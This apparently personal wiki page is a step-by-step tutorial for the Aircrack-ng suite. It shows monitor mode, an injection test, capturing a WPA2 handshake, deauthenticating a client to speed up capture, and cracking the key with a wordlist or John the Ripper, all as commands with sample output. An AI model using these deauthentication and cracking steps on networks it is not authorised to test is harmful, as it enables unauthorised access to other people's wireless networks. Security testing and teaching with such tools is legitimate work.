Aircrack-ng

From Segfault
Jump to navigation Jump to search

Installation

svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng-svn
cd aircrack-ng-svn
make
sudo make install prefix=/opt/aircrack-ng
export MANPATH=/opt/aircrack-ng/share/man:$MANPATH

If libgcrypt is installed, we can try to compile with:

port install libgcrypt                             # Macports
yum install libgcrypt-devel                          # Fedora

make gcrypt=true COMMON_CFLAGS="-I/opt/local/include" LDFLAGS="-L/opt/local/lib"

Note: Please see #1022 ("swap pkh.len when running o a big endian machine") for endianess issues!

Usage

apt-get install iw                         # This will be needed by some of the Aircrack-ng tools

Enable monitoring mode:

airmon-ng start wlan0

Note that for cracking WPA/WPA2, injection needs to work:

$ aireplay-ng --test wlan0
23:01:00  Trying broadcast probe requests...
23:01:00  Injection is working!
23:01:02  Found 1 AP 

23:01:02  Trying directed probe requests...
23:01:02  00:11:22:33:44:55 - channel: 1 - 'Foobar'
23:01:02  Ping (min/avg/max): 1.840ms/19.448ms/37.824ms Power: -35.57
23:01:02  30/30: 100%

OK, injection seems to work. Now, look around your WiFi neighbourhood:

$ airodump-ng wlan0
BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
00:11:22:33:44:55  -19 100     3468    82803  237   1  54e. WPA2 CCMP   PSK  Foobar
 
BSSID              STATION            PWR   Rate     Lost    Frames  Probe
00:11:22:33:44:55  00:22:22:22:22:01   -1   48e- 0      0    31667
00:11:22:33:44:55  00:22:22:22:22:02  -63   54e-54e     0     6291
00:11:22:33:44:55  00:22:22:22:22:03  -68   54e-54e   668    45790 

Dump Wifi packets to a file:

airodump-ng -w wlan0.pcap --bssid 00:11:22:33:44:55 --channel 3 wlan0

While airodump-ng is running, generate some packets on the network so that more data is gathered:

aireplay-ng -a 00:11:22:33:44:55 -c 00:22:22:22:22:03  --deauth 1 wlan0

Try to crack with a password file:

aircrack-ng -w /usr/share/dict/words -b 00:11:22:33:44:55 wlan0.pcap

A good password file is crucial for this to succeed. John The Ripper may be of help here:

john --stdout --incremental:all | aircrack-ng -w - -b 00:11:22:33:44:55 wlan0.pcap

As there's no way to pause aircrack-ng, we can use JtR's resume feature to continue cracking later on:

john --stdout --incremental:all --session=foo | aircrack-ng -w - -b 00:11:22:33:44:55 wlan0.pcap
^C

john --restore=foo | aircrack-ng -w - -b 00:11:22:33:44:55 wlan0.pcap

Links